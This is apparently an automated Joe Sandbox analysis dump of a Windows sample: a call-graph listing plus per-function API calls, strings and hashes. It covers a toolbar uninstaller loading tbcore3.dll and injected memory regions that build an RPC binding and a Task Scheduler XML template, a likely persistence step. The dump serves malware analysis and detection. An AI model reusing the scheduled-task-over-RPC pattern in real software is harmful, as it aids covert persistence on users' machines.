_raise _realloc 3894->3898 3896 b2364e HeapFree 3895->3896 3895->3898 3896->3898 3899 b23660 3896->3899 3900 b23611 ___sbh_find_block 3897->3900 3898->3859 3901 b22c72 _raise 64 API calls 3899->3901 3903 b2362b 3900->3903 3931 b24614 3900->3931 3902 b23665 GetLastError 3901->3902 3902->3898 3937 b23644 3903->3937 
3907 b213ec Sleep GetModuleHandleW 3906->3907 3908 b2140a 3907->3908 3909 b2140e 3907->3909 3908->3907 3908->3909 3909->3870 3909->3872 3910->3877 3929 b229c6 LeaveCriticalSection 3911->3929 3913 b2227c 3913->3887 3915 b23cbf 3914->3915 3916 b23cbc InterlockedIncrement 3914->3916 3917 b23cc9 InterlockedIncrement 3915->3917 3918 b23ccc 3915->3918 3916->3915 3917->3918 3919 b23cd6 InterlockedIncrement 3918->3919 3920 b23cd9 3918->3920 3919->3920 3921 b23ce3 InterlockedIncrement 3920->3921 3922 b23ce6 3920->3922 3921->3922 3923 b23cff InterlockedIncrement 3922->3923 3924 b23d0f InterlockedIncrement 3922->3924 3925 b23d1a InterlockedIncrement 3922->3925 3923->3922 3924->3922 3925->3890 3930 b229c6 LeaveCriticalSection 3926->3930 3928 b222ca 3928->3892 3929->3913 3930->3928 3932 b248f5 ___sbh_free_block 3931->3932 3933 b24653 3931->3933 3932->3903 3933->3932 3934 b2483f VirtualFree 3933->3934 3935 b248a3 3934->3935 3935->3932 3936 b248b2 VirtualFree HeapFree 3935->3936 3936->3932 3940 b229c6 LeaveCriticalSection 3937->3940 3939 b2364b 3939->3895 3940->3939 3942 b229e9 _raise 3941->3942 3943 b22a0f 3942->3943 3967 b218c4 3942->3967 3949 b22a1f _raise 3943->3949 4013 b236eb 3943->4013 3949->3831 3951 b22a40 3955 b22aa0 __lock 66 API calls 3951->3955 3952 b22a31 3954 b22c72 _raise 66 API calls 3952->3954 3954->3949 3956 b22a47 3955->3956 3957 b22a7b 3956->3957 3958 b22a4f 3956->3958 3960 b235ee __mtinitlocknum 66 API calls 3957->3960 3959 b2317c __mtinitlocknum InitializeCriticalSectionAndSpinCount 3958->3959 3961 b22a5a 3959->3961 3962 b22a6c 3960->3962 3961->3962 3963 b235ee __mtinitlocknum 66 API calls 3961->3963 4018 b22a97 3962->4018 3965 b22a66 3963->3965 3966 b22c72 _raise 66 API calls 3965->3966 3966->3962 4021 b235a3 3967->4021 3970 b235a3 __set_error_mode 66 API calls 3972 b218d8 3970->3972 3971 b21719 __NMSG_WRITE 66 API calls 3973 b218f0 3971->3973 3972->3971 3974 b218fa 3972->3974 3975 b21719 __NMSG_WRITE 66 API calls 3973->3975 3976 b21719 3974->3976 
3975->3974 3977 b2172d 3976->3977 3978 b235a3 __set_error_mode 63 API calls 3977->3978 4009 b21888 3977->4009 3979 b2174f 3978->3979 3980 b2188d GetStdHandle 3979->3980 3982 b235a3 __set_error_mode 63 API calls 3979->3982 3981 b2189b _strlen 3980->3981 3980->4009 3985 b218b4 WriteFile 3981->3985 3981->4009 3983 b21760 3982->3983 3983->3980 3984 b21772 3983->3984 3984->4009 4027 b2353b 3984->4027 3985->4009 3988 b217a8 GetModuleFileNameA 3989 b217c6 3988->3989 3994 b217e9 _strlen 3988->3994 3991 b2353b _strcpy_s 63 API calls 3989->3991 3993 b217d6 3991->3993 3993->3994 3995 b22ae2 __invoke_watson 10 API calls 3993->3995 4005 b2182c 3994->4005 4043 b233f0 3994->4043 3995->3994 4000 b22ae2 __invoke_watson 10 API calls 4003 b21850 4000->4003 4001 b2337c _strcat_s 63 API calls 4004 b21864 4001->4004 4002 b22ae2 __invoke_watson 10 API calls 4002->4005 4003->4001 4006 b21875 4004->4006 4008 b22ae2 __invoke_watson 10 API calls 4004->4008 4052 b2337c 4005->4052 4061 b23213 4006->4061 4008->4006 4010 b21465 4009->4010 4112 b2143a GetModuleHandleW 4010->4112 4017 b236f4 4013->4017 4015 b22a2a 4015->3951 4015->3952 4016 b2370b Sleep 4016->4017 4017->4015 4017->4016 4115 b254b5 4017->4115 4144 b229c6 LeaveCriticalSection 4018->4144 4020 b22a9e 4020->3949 4022 b235b2 4021->4022 4023 b22c72 _raise 66 API calls 4022->4023 4024 b218cb 4022->4024 4025 b235d5 4023->4025 4024->3970 4024->3972 4026 b22c0a _raise 6 API calls 4025->4026 4026->4024 4028 b23553 4027->4028 4029 b2354c 4027->4029 4030 b22c72 _raise 66 API calls 4028->4030 4029->4028 4034 b23579 4029->4034 4031 b23558 4030->4031 4032 b22c0a _raise 6 API calls 4031->4032 4033 b21794 4032->4033 4033->3988 4036 b22ae2 4033->4036 4034->4033 4035 b22c72 _raise 66 API calls 4034->4035 4035->4031 4088 b25320 4036->4088 4038 b22b0f IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 4039 b22beb GetCurrentProcess TerminateProcess 4038->4039 4040 b22bdf __invoke_watson 4038->4040 4090 b210cc 4039->4090 4040->4039 
4042 b217a5 4042->3988 4047 b23402 4043->4047 4044 b23406 4045 b21819 4044->4045 4046 b22c72 _raise 66 API calls 4044->4046 4045->4002 4045->4005 4048 b23422 4046->4048 4047->4044 4047->4045 4050 b2344c 4047->4050 4049 b22c0a _raise 6 API calls 4048->4049 4049->4045 4050->4045 4051 b22c72 _raise 66 API calls 4050->4051 4051->4048 4055 b23394 4052->4055 4056 b2338d 4052->4056 4053 b22c72 _raise 66 API calls 4054 b23399 4053->4054 4057 b22c0a _raise 6 API calls 4054->4057 4055->4053 4056->4055 4058 b233c8 4056->4058 4059 b2183f 4057->4059 4058->4059 4060 b22c72 _raise 66 API calls 4058->4060 4059->4000 4059->4003 4060->4054 4099 b220f0 4061->4099 4064 b23236 LoadLibraryA 4066 b23360 4064->4066 4067 b2324b GetProcAddress 4064->4067 4065 b232be 4071 b220f9 __decode_pointer 6 API calls 4065->4071 4084 b232e8 4065->4084 4066->4009 4067->4066 4069 b23261 4067->4069 4068 b23313 4073 b220f9 __decode_pointer 6 API calls 4068->4073 4102 b2207e TlsGetValue 4069->4102 4070 b220f9 __decode_pointer 6 API calls 4081 b2332b 4070->4081 4074 b232db 4071->4074 4073->4066 4076 b220f9 __decode_pointer 6 API calls 4074->4076 4076->4084 4077 b2207e __encode_pointer 6 API calls 4078 b2327c GetProcAddress 4077->4078 4079 b2207e __encode_pointer 6 API calls 4078->4079 4080 b23291 GetProcAddress 4079->4080 4082 b2207e __encode_pointer 6 API calls 4080->4082 4081->4068 4083 b220f9 __decode_pointer 6 API calls 4081->4083 4085 b232a6 4082->4085 4083->4068 4084->4068 4084->4070 4085->4065 4086 b232b0 GetProcAddress 4085->4086 4087 b2207e __encode_pointer 6 API calls 4086->4087 4087->4065 4089 b2532c __VEC_memzero 4088->4089 4089->4038 4091 b210d6 IsDebuggerPresent 4090->4091 4092 b210d4 4090->4092 4098 b228d2 4091->4098 4092->4042 4095 b21358 SetUnhandledExceptionFilter UnhandledExceptionFilter 4096 b21375 __invoke_watson 4095->4096 4097 b2137d GetCurrentProcess TerminateProcess 4095->4097 4096->4097 4097->4042 4098->4095 4100 b2207e __encode_pointer 6 API calls 4099->4100 4101 b220f7 4100->4101 
4101->4064 4101->4065 4103 b22096 4102->4103 4104 b220b7 GetModuleHandleW 4102->4104 4103->4104 4107 b220a0 TlsGetValue 4103->4107 4105 b220d2 GetProcAddress 4104->4105 4106 b220c7 4104->4106 4111 b220af GetProcAddress 4105->4111 4108 b213e1 __crt_waiting_on_module_handle 2 API calls 4106->4108 4109 b220ab 4107->4109 4110 b220cd 4108->4110 4109->4104 4109->4111 4110->4105 4110->4111 4111->4077 4113 b2145e ExitProcess 4112->4113 4114 b2144e GetProcAddress 4112->4114 4114->4113 4116 b25568 4115->4116 4124 b254c7 4115->4124 4117 b231eb __calloc_impl 6 API calls 4116->4117 4118 b2556e 4117->4118 4119 b22c72 _raise 65 API calls 4118->4119 4131 b25560 4119->4131 4120 b218c4 __FF_MSGBANNER 65 API calls 4120->4124 4121 b21719 __NMSG_WRITE 65 API calls 4121->4124 4123 b25524 HeapAlloc 4123->4124 4124->4120 4124->4121 4124->4123 4125 b21465 __mtinitlocknum 3 API calls 4124->4125 4126 b25554 4124->4126 4127 b231eb __calloc_impl 6 API calls 4124->4127 4129 b25559 4124->4129 4124->4131 4132 b25466 4124->4132 4125->4124 4128 b22c72 _raise 65 API calls 4126->4128 4127->4124 4128->4129 4130 b22c72 _raise 65 API calls 4129->4130 4130->4131 4131->4017 4133 b25472 _raise 4132->4133 4134 b254a3 _raise 4133->4134 4135 b22aa0 __lock 66 API calls 4133->4135 4134->4124 4136 b25488 4135->4136 4137 b24dc3 ___sbh_alloc_block 5 API calls 4136->4137 4138 b25493 4137->4138 4140 b254ac 4138->4140 4143 b229c6 LeaveCriticalSection 4140->4143 4142 b254b3 4142->4134 4143->4142 4144->4020 4146 b24971 HeapAlloc 4145->4146 4147 b2493d HeapReAlloc 4145->4147 4148 b2495b 4146->4148 4150 b24994 VirtualAlloc 4146->4150 4147->4148 4149 b2495f 4147->4149 4148->3835 4149->4146 4150->4148 4151 b249ae HeapFree 4150->4151 4151->4148 4153 b249f1 VirtualAlloc 4152->4153 4155 b24a38 4153->4155 4155->3839 4156->3842 4157->3806 4159 b23808 4158->4159 4160 b2382f __VEC_memcpy 4159->4160 4161 b21dd3 4159->4161 4160->4161 4161->3705 4163 b23694 4162->4163 4164 b2368d 4162->4164 4165 b22c72 _raise 66 API calls 4163->4165 
4164->4163 4169 b236c0 4164->4169 4166 b23699 4165->4166 4167 b22c0a _raise 6 API calls 4166->4167 4168 b236a8 4167->4168 4168->3718 4169->4168 4170 b22c72 _raise 66 API calls 4169->4170 4170->4166 4172 b22dc9 4171->4172 4173 b2207e __encode_pointer 6 API calls 4172->4173 4174 b22de1 4172->4174 4173->4172 4174->3723 4178 b22d70 4175->4178 4177 b22db9 4177->3725 4179 b22d7c _raise 4178->4179 4186 b2147d 4179->4186 4185 b22d9d _raise 4185->4177 4187 b22aa0 __lock 66 API calls 4186->4187 4188 b21484 4187->4188 4189 b22c85 4188->4189 4190 b220f9 __decode_pointer 6 API calls 4189->4190 4191 b22c99 4190->4191 4192 b220f9 __decode_pointer 6 API calls 4191->4192 4193 b22ca9 4192->4193 4201 b22d2c 4193->4201 4209 b2539a 4193->4209 4195 b22cc7 4197 b22ceb 4195->4197 4205 b22d13 4195->4205 4222 b2377c 4195->4222 4196 b2207e __encode_pointer 6 API calls 4198 b22d21 4196->4198 4197->4201 4202 b2377c __realloc_crt 73 API calls 4197->4202 4203 b22d01 4197->4203 4199 b2207e __encode_pointer 6 API calls 4198->4199 4199->4201 4206 b22da6 4201->4206 4202->4203 4203->4201 4204 b2207e __encode_pointer 6 API calls 4203->4204 4204->4205 4205->4196 4272 b21486 4206->4272 4210 b253a6 _raise 4209->4210 4211 b253d3 4210->4211 4212 b253b6 4210->4212 4214 b25414 HeapSize 4211->4214 4216 b22aa0 __lock 66 API calls 4211->4216 4213 b22c72 _raise 66 API calls 4212->4213 4215 b253bb 4213->4215 4217 b253cb _raise 4214->4217 4218 b22c0a _raise 6 API calls 4215->4218 4219 b253e3 ___sbh_find_block 4216->4219 4217->4195 4218->4217 4227 b25434 4219->4227 4225 b23785 4222->4225 4224 b237c4 4224->4197 4225->4224 4226 b237a5 Sleep 4225->4226 4231 b2569d 4225->4231 4226->4225 4230 b229c6 LeaveCriticalSection 4227->4230 4229 b2540f 4229->4214 4229->4217 4230->4229 4232 b256a9 _raise 4231->4232 4233 b256b0 4232->4233 4234 b256be 4232->4234 4235 b254b5 _malloc 66 API calls 4233->4235 4236 b256d1 4234->4236 4237 b256c5 4234->4237 4240 b256b8 _raise _realloc 4235->4240 4245 b25843 4236->4245 4253 b256de 
___sbh_resize_block ___sbh_find_block 4236->4253 4238 b235ee __mtinitlocknum 66 API calls 4237->4238 4238->4240 4239 b25876 4241 b231eb __calloc_impl 6 API calls 4239->4241 4240->4225 4244 b2587c 4241->4244 4242 b22aa0 __lock 66 API calls 4242->4253 4243 b25848 HeapReAlloc 4243->4240 4243->4245 4246 b22c72 _raise 66 API calls 4244->4246 4245->4239 4245->4243 4247 b2589a 4245->4247 4248 b231eb __calloc_impl 6 API calls 4245->4248 4250 b25890 4245->4250 4246->4240 4247->4240 4249 b22c72 _raise 66 API calls 4247->4249 4248->4245 4251 b258a3 GetLastError 4249->4251 4254 b22c72 _raise 66 API calls 4250->4254 4251->4240 4253->4239 4253->4240 4253->4242 4255 b25769 HeapAlloc 4253->4255 4256 b257be HeapReAlloc 4253->4256 4258 b24dc3 ___sbh_alloc_block 5 API calls 4253->4258 4259 b25829 4253->4259 4260 b231eb __calloc_impl 6 API calls 4253->4260 4262 b237f0 __VEC_memcpy _realloc 4253->4262 4264 b2580c 4253->4264 4267 b24614 VirtualFree VirtualFree HeapFree ___sbh_free_block 4253->4267 4268 b257e1 4253->4268 4266 b25811 4254->4266 4255->4253 4256->4253 4257 b25816 GetLastError 4257->4240 4258->4253 4259->4240 4261 b22c72 _raise 66 API calls 4259->4261 4260->4253 4263 b25836 4261->4263 4262->4253 4263->4240 4263->4251 4265 b22c72 _raise 66 API calls 4264->4265 4265->4266 4266->4240 4266->4257 4267->4253 4271 b229c6 LeaveCriticalSection 4268->4271 4270 b257e8 4270->4253 4271->4270 4275 b229c6 LeaveCriticalSection 4272->4275 4274 b2148d 4274->4185 4275->4274 4277 b220f0 _raise 6 API calls 4276->4277 4278 b216d3 __init_pointers __initp_misc_winsig 4277->4278 4298 b22913 4278->4298 4281 b2207e __encode_pointer 6 API calls 4282 b2170f 4281->4282 4282->3762 4286 b2292f 4283->4286 4284 b2317c __mtinitlocknum InitializeCriticalSectionAndSpinCount 4284->4286 4285 b225a8 4285->3753 4285->3772 4286->4284 4286->4285 4288 b221b2 4287->4288 4289 b221be 4287->4289 4291 b220f9 __decode_pointer 6 API calls 4288->4291 4290 b221d2 TlsFree 4289->4290 4292 b221e0 4289->4292 4290->4292 4291->4289 
4293 b2298b DeleteCriticalSection 4292->4293 4294 b229a3 4292->4294 4295 b235ee __mtinitlocknum 66 API calls 4293->4295 4296 b229c3 4294->4296 4297 b229b5 DeleteCriticalSection 4294->4297 4295->4292 4296->3757 4297->4294 4299 b2207e __encode_pointer 6 API calls 4298->4299 4300 b21705 4299->4300 4300->4281 4302 b21561 _raise 4301->4302 4303 b22aa0 __lock 66 API calls 4302->4303 4304 b21568 4303->4304 4305 b21621 __initterm 4304->4305 4308 b220f9 __decode_pointer 6 API calls 4304->4308 4318 b2166c 4305->4318 4310 b2159f 4308->4310 4309 b21669 _raise 4309->3794 4310->4305 4313 b220f9 __decode_pointer 6 API calls 4310->4313 4312 b21660 4314 b21465 __mtinitlocknum 3 API calls 4312->4314 4316 b215b4 4313->4316 4314->4309 4315 b220f0 6 API calls _raise 4315->4316 4316->4305 4316->4315 4317 b220f9 6 API calls __decode_pointer 4316->4317 4317->4316 4319 b21672 4318->4319 4320 b2164d 4318->4320 4323 b229c6 LeaveCriticalSection 4319->4323 4320->4309 4322 b229c6 LeaveCriticalSection 4320->4322 4322->4312 4323->4320 4931 b267c8 RtlUnwind 4411 b2122e 4414 b218fe 4411->4414 4413 b2123f 4415 b222cc __getptd_noexit 66 API calls 4414->4415 4416 b2190b 4415->4416 4416->4413 4416->4416 4483 b2458d 4486 b229c6 LeaveCriticalSection 4483->4486 4485 b24594 4486->4485

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • CoInitialize.OLE32(00000000), ref: 00B21006
                                                                                        • CreateMutexW.KERNEL32(00000000,00000000,Global\IEToolbarUninstaller), ref: 00B21013
                                                                                        • GetLastError.KERNEL32 ref: 00B2101F
                                                                                        • GetCommandLineW.KERNEL32(?), ref: 00B21040
                                                                                        • CommandLineToArgvW.SHELL32(00000000), ref: 00B21047
                                                                                        • PathFileExistsW.SHLWAPI(tbcore3.dll), ref: 00B21061
                                                                                        • PathFileExistsW.SHLWAPI(tbcore3U.dll), ref: 00B21073
                                                                                        • LoadLibraryW.KERNEL32(?), ref: 00B21085
                                                                                        • GetProcAddress.KERNEL32(00000000,MyUnregisterServer), ref: 00B21097
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00B210A4
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00B210AB
                                                                                        • CoUninitialize.OLE32 ref: 00B210B1
                                                                                        • LocalFree.KERNEL32(00000000), ref: 00B210BC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000002.3514225993.0000000000B21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B20000, based on PE: true
                                                                                        • Associated: 00000028.00000002.3514200896.0000000000B20000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000028.00000002.3514252671.0000000000B28000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000028.00000002.3514278623.0000000000B2A000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000028.00000002.3514303518.0000000000B2C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_2_b20000_2dHqG0.jbxd
                                                                                        Similarity
                                                                                        • API ID: CommandExistsFileFreeLibraryLinePath$AddressArgvCloseCreateErrorHandleInitializeLastLoadLocalMutexProcUninitialize
                                                                                        • String ID: Global\IEToolbarUninstaller$MyUnregisterServer$tbcore3.dll$tbcore3U.dll
                                                                                        • API String ID: 474438367-4110843154
                                                                                        • Opcode ID: 9e73e81bb1819efc4213d0b2829b3f1c705ecdeec8faec081e8bc46dd5662059
                                                                                        • Instruction ID: 825b3236885ec5490c60d79743f94d407d4041b4e40a67c61aa94a3ff4e8dab4
                                                                                        • Opcode Fuzzy Hash: 9e73e81bb1819efc4213d0b2829b3f1c705ecdeec8faec081e8bc46dd5662059
                                                                                        • Instruction Fuzzy Hash: 7A11B132606275EB9331AB64BC48E9F37D8EA68752B0149A5F54EE3050CF218846C7B6

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • __RTC_Initialize.LIBCMT ref: 0254147E
                                                                                        • ___scrt_uninitialize_crt.LIBCMT ref: 02541498
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000002.3514566277.0000000002540000.00000040.00001000.00020000.00000000.sdmp, Offset: 02540000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_2_2540000_2dHqG0.jbxd
                                                                                        Similarity
                                                                                        • API ID: Initialize___scrt_uninitialize_crt
                                                                                        • String ID:
                                                                                        • API String ID: 2442719207-0
                                                                                        • Opcode ID: fbb9217d6b3ea1309e49dc12e52dbc1dd7c19ee259579c80676a2fd9203456b3
                                                                                        • Instruction ID: bed9d6bc83c3abcf4d45918b5c010f19f453d330754dd35e83b839bdd1214f7f
                                                                                        • Opcode Fuzzy Hash: fbb9217d6b3ea1309e49dc12e52dbc1dd7c19ee259579c80676a2fd9203456b3
                                                                                        • Instruction Fuzzy Hash: 6941A672D00A29ABDB219F95D8407EEFA79FB807ADF01C515E81E57140DF308D819F98

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 025410A0: RpcStringBindingComposeW.RPCRT4(02558850,ncacn_np,localhost,0255889C,00000000,?), ref: 025410DB
                                                                                          • Part of subcall function 025410A0: RpcBindingFromStringBindingW.RPCRT4(?,?), ref: 025410E9
                                                                                          • Part of subcall function 025410A0: RpcBindingSetAuthInfoExA.RPCRT4(?,00000000,00000006,0000000A,00000000,00000000,00000001), ref: 0254111D
                                                                                          • Part of subcall function 025410A0: RpcStringFreeW.RPCRT4(?), ref: 02541127
                                                                                        • _swprintf.LIBCMTD ref: 025411A9
                                                                                          • Part of subcall function 02541060: __vswprintf_s_l.LIBCONCRTD ref: 0254107E
                                                                                        • _swprintf.LIBCMTD ref: 025411DC
                                                                                          • Part of subcall function 025412A0: NdrClientCall2.RPCRT4 ref: 025412BC
                                                                                        Strings
                                                                                        • <?xml version="1.0" encoding="UTF-16"?><Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> <Regi, xrefs: 02541198
                                                                                        • \%s, xrefs: 025411CB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000002.3514566277.0000000002540000.00000040.00001000.00020000.00000000.sdmp, Offset: 02540000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_2_2540000_2dHqG0.jbxd
                                                                                        Similarity
                                                                                        • API ID: Binding$String$_swprintf$AuthCall2ClientComposeFreeFromInfo__vswprintf_s_l
                                                                                        • String ID: <?xml version="1.0" encoding="UTF-16"?><Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> <Regi$\%s
                                                                                        • API String ID: 2434665183-3516990142
                                                                                        • Opcode ID: f948f41bba39a1d773c43ea6b722a0f98e31bd682c8eaedfc60f234f95dca2f1
                                                                                        • Instruction ID: d813fc05d19ed0de3be0c7376d4ece9a2dedcdbf9448955312a9c3c361753486
                                                                                        • Opcode Fuzzy Hash: f948f41bba39a1d773c43ea6b722a0f98e31bd682c8eaedfc60f234f95dca2f1
                                                                                        • Instruction Fuzzy Hash: 0E2195F5950258ABDB10DF50DC41F9DB3F9BB44704F40C895BB0DAA180EE74AA888F9C

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 0254A717
                                                                                          • Part of subcall function 0254A66C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0254E4AF,?,00000000,-00000008), ref: 0254A6CD
                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0254A74F
                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0254A76F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000002.3514566277.0000000002540000.00000040.00001000.00020000.00000000.sdmp, Offset: 02540000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_2_2540000_2dHqG0.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                        • String ID:
                                                                                        • API String ID: 158306478-0
                                                                                        • Opcode ID: c471f377dcbe4bd632b4c89c199e85c3e23da3d7b49b78e3e21526653f8116ff
                                                                                        • Instruction ID: 756e9aed870e3552541499af126fc416dd0d7bfaab7d7d56cf62e122ae5aecfc
                                                                                        • Opcode Fuzzy Hash: c471f377dcbe4bd632b4c89c199e85c3e23da3d7b49b78e3e21526653f8116ff
                                                                                        • Instruction Fuzzy Hash: FD1182B5A416167EA7A126759CACD7FFDAEEDC429C3000824F50591100EF209D0086BC
                                                                                        APIs
                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 025401DF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000003.3240271717.0000000002540000.00000040.00001000.00020000.00000000.sdmp, Offset: 02540000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_3_2540000_2dHqG0.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                                        • Instruction ID: f63a95c7cac13aff6b3832ed30adf5e72f952002ca0a7ebfdaf71d5bfe49012d
                                                                                        • Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                                        • Instruction Fuzzy Hash: 94A15D70A00606EFDB18CFA9C880AADFBB5FF48308B648169E515D7391DB30E951CB94
                                                                                        APIs
                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0254048B
                                                                                        • VirtualFree.KERNELBASE(?,?,00004000), ref: 025404F1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000003.3240271717.0000000002540000.00000040.00001000.00020000.00000000.sdmp, Offset: 02540000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_3_2540000_2dHqG0.jbxd
                                                                                        Similarity
                                                                                        • API ID: Virtual$AllocFree
                                                                                        • String ID:
                                                                                        • API String ID: 2087232378-0
                                                                                        • Opcode ID: 85e613f023628dd9a35c971c8f35ac366b6d7af4f068bcc7d0f9ba1c9b2aec73
                                                                                        • Instruction ID: 1ae7b434120c6243dd650189f65abe5e9dc0b147ebb9cad9dfc72f0dac97fad2
                                                                                        • Opcode Fuzzy Hash: 85e613f023628dd9a35c971c8f35ac366b6d7af4f068bcc7d0f9ba1c9b2aec73
                                                                                        • Instruction Fuzzy Hash: 4421DE75500305ABDB249EA4CC84FAFFBF9BF44318F614468EB5AA21C1DF71A5019664
                                                                                        APIs
                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0244048B
                                                                                        • VirtualFree.KERNELBASE(?,?,00004000), ref: 024404F1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000003.3243525764.0000000002440000.00000040.00001000.00020000.00000000.sdmp, Offset: 02440000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_3_2440000_2dHqG0.jbxd
                                                                                        Similarity
                                                                                        • API ID: Virtual$AllocFree
                                                                                        • String ID:
                                                                                        • API String ID: 2087232378-0
                                                                                        • Opcode ID: 85e613f023628dd9a35c971c8f35ac366b6d7af4f068bcc7d0f9ba1c9b2aec73
                                                                                        • Instruction ID: 3858d273b288665fbc9d42fb705c80cb357c240e5d032b0ce398393f52aabb61
                                                                                        • Opcode Fuzzy Hash: 85e613f023628dd9a35c971c8f35ac366b6d7af4f068bcc7d0f9ba1c9b2aec73
                                                                                        • Instruction Fuzzy Hash: 59210B75A00305BBE7249EA48C80FAFB7F9AF04314F514429EB0AA2281DF31A9219A60

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 104 2547700-254770c 105 254773e-2547749 call 25476b3 104->105 106 254770e-2547710 104->106 113 254774b-254774d 105->113 108 2547712-2547713 106->108 109 2547729-254773a RtlAllocateHeap 106->109 108->109 110 2547715-254771c call 254b39c 109->110 111 254773c 109->111 110->105 116 254771e-2547727 call 254acfe 110->116 111->113 116->105 116->109
                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,?,?,025444B1,?,00000000,?,?,?,?,02544FB0,?,?,00000041,?), ref: 02547732
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000002.3514566277.0000000002540000.00000040.00001000.00020000.00000000.sdmp, Offset: 02540000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_2_2540000_2dHqG0.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1279760036-0
                                                                                        • Opcode ID: 0079165aa86bb2cce24cf28f1ca465137b7cdb71b45082d5e63f912fa97d8849
                                                                                        • Instruction ID: 1025beda0e08746f4ca4f673ea68e17d01e405c47937846513524194efdf00d2
                                                                                        • Opcode Fuzzy Hash: 0079165aa86bb2cce24cf28f1ca465137b7cdb71b45082d5e63f912fa97d8849
                                                                                        • Instruction Fuzzy Hash: 30E06531941226A7E6212A769D04F5AFE4AFF896ACF950511AC15A6190DF60D800CAEC

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 119 b2261b-b2263d HeapCreate 120 b22641-b2264a 119->120 121 b2263f-b22640 119->121
                                                                                        APIs
                                                                                        • HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 00B22630
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000002.3514225993.0000000000B21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B20000, based on PE: true
                                                                                        • Associated: 00000028.00000002.3514200896.0000000000B20000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000028.00000002.3514252671.0000000000B28000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000028.00000002.3514278623.0000000000B2A000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000028.00000002.3514303518.0000000000B2C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_2_b20000_2dHqG0.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 10892065-0
                                                                                        • Opcode ID: 811f2e9ed0baea609c724846832d731e2298658fb9676675657f0195c0cde08c
                                                                                        • Instruction ID: 7f405acfac8455b12e45efef596dc1d06f11f6ea81f3453de8c3150bbd3d7bd5
                                                                                        • Opcode Fuzzy Hash: 811f2e9ed0baea609c724846832d731e2298658fb9676675657f0195c0cde08c
                                                                                        • Instruction Fuzzy Hash: EFD0A7325543456EEB205F717C48B223BDCD384795F104475B90CC7260FE70D992CA44
                                                                                        APIs
                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 024401DF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000003.3243525764.0000000002440000.00000040.00001000.00020000.00000000.sdmp, Offset: 02440000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_3_2440000_2dHqG0.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
